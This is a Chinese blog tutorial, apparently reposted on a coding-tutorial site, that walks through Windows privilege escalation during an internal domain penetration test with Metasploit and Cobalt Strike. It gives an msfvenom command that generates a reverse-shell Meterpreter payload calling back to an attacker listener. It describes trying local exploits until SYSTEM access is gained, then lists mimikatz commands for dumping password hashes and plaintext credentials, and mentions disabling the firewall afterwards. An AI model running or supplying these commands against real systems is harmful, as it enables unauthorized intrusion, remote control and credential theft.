2021-09-27 内网域渗透低权限提权(五-3 用metasploit,cobaltstrike来辅助提权)

2021/10/2 20:42:10

本文主要是介绍2021-09-27 内网域渗透低权限提权(五-3 用metasploit,cobaltstrike来辅助提权),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

(๑•⌄•๑)
3借用metasploit,cobaltstrike来辅助提权
ps: Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。
kali中 打开cmd就在当前文件夹下输入命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.127.129 LPORT=6666 -f exe > 666.exe

得到666.exe文件 将其复制到受害机上(可通过共享文件夹 可参考此链接:https://jingyan.baidu.com/article/aa6a2c141d04a74d4d19c430.html)
ps:reverse_tcp:这是一个基于TCP的反向链接反弹shell, 使用起来很稳定
在这里插入图片描述
kali上设置监听 打开受害机的666文件
在这里插入图片描述
在这里插入图片描述
run后发现还是低权限
在这里插入图片描述
提权
在这里插入图片描述
得到好几个exp 一个一个试(use加文件名)
background#返回,把meterpreter后台挂起 返回到msf
sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
sesssions -k number #与会话进行交互
run和bgrun# 前台和后台执行以后它选定的 meterpreter 脚本
ps:.mimikatz

meterpreter > load mimikatz #加载mimikatz

meterpreter > msv #获取hash值

meterpreter > kerberos #获取明文

meterpreter >ssp #获取明文信息

meterpreter > wdigest #获取系统账户信息

meterpreter >mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示

meterpreter >mimikatz_command -f hash:: #获取目标 hash

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
在这里插入图片描述

在这里插入图片描述
不断的试 use+漏洞利用名称
第三个试出来了 getuid发现是system权限
在这里插入图片描述
cs
cobaltstrike:加插件 图形化利用
在这里插入图片描述
通过提权可以得到一个高权限的用户身份 之后可以做很多事情:开启远程桌面 关闭防火墙 抓密码 抓hash。。
在这里插入图片描述



这篇关于2021-09-27 内网域渗透低权限提权(五-3 用metasploit,cobaltstrike来辅助提权)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程